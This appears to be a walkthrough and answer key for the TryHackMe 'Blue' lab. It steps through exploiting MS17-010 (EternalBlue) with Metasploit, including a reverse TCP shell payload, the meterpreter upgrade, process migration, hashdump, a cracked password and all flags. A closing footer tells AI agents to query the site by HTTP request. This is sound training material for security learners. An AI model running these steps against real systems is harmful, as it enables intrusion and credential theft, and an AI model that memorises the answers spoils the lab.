# Blue {% embed url="" %} {% endembed %} | Room Attributes | Value | | --------------------- | ---------------------------------------------------------------------- | | Subscription Required | False \[Free] | | Type | Walkthroughs | | Difficulty | Medium | | Tags | Windows, Eternal Blue, MS17-010, CVE2017-0144 | ## Video Walkthrough {% embed url="" %} [https://youtu.be/NkCTJA1Pmvg](https://youtu.be/NkCTJA1Pmvg?list=PL5-_Nmz1hGn9WwYmD2CgXYZycSuCBxbrs) {% endembed %} ## Task 1 Recon ### Scan the machine. (If you are unsure how to tackle this, I recommend checking out the [Nmap](https://tryhackme.com/room/furthernmap) room) {% hint style="warning" %} **HINT:** `Command: nmap -sV -vv --script vuln TARGET_IP` {% endhint %} {% hint style="success" %} No answer needed {% endhint %} ### How many ports are open with a port number under 1000? {% hint style="warning" %} **HINT:** Near the top of the nmap output: PORT STATE SERVICE {% endhint %}
Reveal Flag 🚩 :triangular\_flag\_on\_post:`3`
### What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067) {% hint style="warning" %} **HINT:** Revealed by the ShadowBrokers, exploits an issue within SMBv1 {% endhint %}
Reveal Flag 🚩 :triangular\_flag\_on\_post:`ms17-010`
## Task 2 Gain Access ### Start [Metasploit](https://tryhackme.com/room/rpmetasploit) {% hint style="warning" %} **HINT:** Command: msfconsole {% endhint %} {% hint style="success" %} No answer needed {% endhint %} ### Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........) {% hint style="warning" %} **HINT:** search ms?? {% endhint %}
Reveal Flag 🚩 :triangular\_flag\_on\_post:`exploit/windows/smb/ms17_010_eternalblue`
### Show options and set the one required value. What is the name of this value? (All caps for submission) {% hint style="warning" %} **HINT:** Command: show options {% endhint %}
Reveal Flag 🚩 :triangular\_flag\_on\_post:`RHOSTS`
### Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter: `set payload windows/x64/shell/reverse_tcp` With that done, run the exploit! {% hint style="warning" %} **HINT:** Command: run (or exploit) {% endhint %} {% hint style="success" %} No answer needed {% endhint %} ### Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target. {% hint style="success" %} No answer needed {% endhint %} ## Task 3 Escalate ### If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected) {% hint style="warning" %} **HINT:** Google this: shell\_to\_meterpreter {% endhint %}
Reveal Flag 🚩 :triangular\_flag\_on\_post:`post/multi/manage/shell_to_meterpreter`
### Select this (use MODULE\_PATH). Show options, what option are we required to change?
Reveal Flag 🚩 :triangular\_flag\_on\_post:`SESSION`
### Set the required option, you may need to list all of the sessions to find your target here. {% hint style="warning" %} **HINT:** sessions -l {% endhint %} {% hint style="success" %} No answer needed {% endhint %} ### Run! If this doesn't work, try completing the exploit from the previous task once more. {% hint style="warning" %} **HINT:** Command: run (or exploit) {% endhint %} {% hint style="success" %} No answer needed {% endhint %} ### Once the meterpreter shell conversion completes, select that session for use. {% hint style="warning" %} **HINT:** sessions SESSION\_NUMBER {% endhint %} {% hint style="success" %} No answer needed {% endhint %} ### Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again. {% hint style="success" %} No answer needed {% endhint %} ### List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column). {% hint style="success" %} No answer needed {% endhint %} ### Migrate to this process using the 'migrate PROCESS\_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time. {% hint style="success" %} No answer needed {% endhint %} ## Task 4 Cracking ### Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Reveal Flag 🚩 :triangular\_flag\_on\_post:`Jon`
### Copy this password hash to a file and research how to crack it. What is the cracked password? {% hint style="warning" %} **HINT:** This password can be found within the rockyou.txt wordlist {% endhint %}
Reveal Flag 🚩 :triangular\_flag\_on\_post:`alqfna22`
## Task 5 Find flags! ### Flag1? *This flag can be found at the system root.* {% hint style="warning" %} **HINT:** Can you C it? {% endhint %}
Reveal Flag 🚩 :triangular\_flag\_on\_post:flag{access\_the\_machine}
### Flag2? *This flag can be found at the location where passwords are stored within Windows.* \*Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen. {% hint style="warning" %} **HINT:** I wish I wrote down where I kept my password. Luckily it's still stored here on Windows. {% endhint %}
Reveal Flag 🚩 :triangular\_flag\_on\_post:`flag{sam_database_elevated_access}`
### flag3? *This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.* {% hint style="warning" %} **HINT:** You'll need to have elevated privileges to access this flag. {% endhint %}
Reveal Flag 🚩 :triangular\_flag\_on\_post:`flag{admin_documents_can_be_valuable}`
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://thmflags.gitbook.io/thm-walkthroughs/difficulty-easy/blue.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.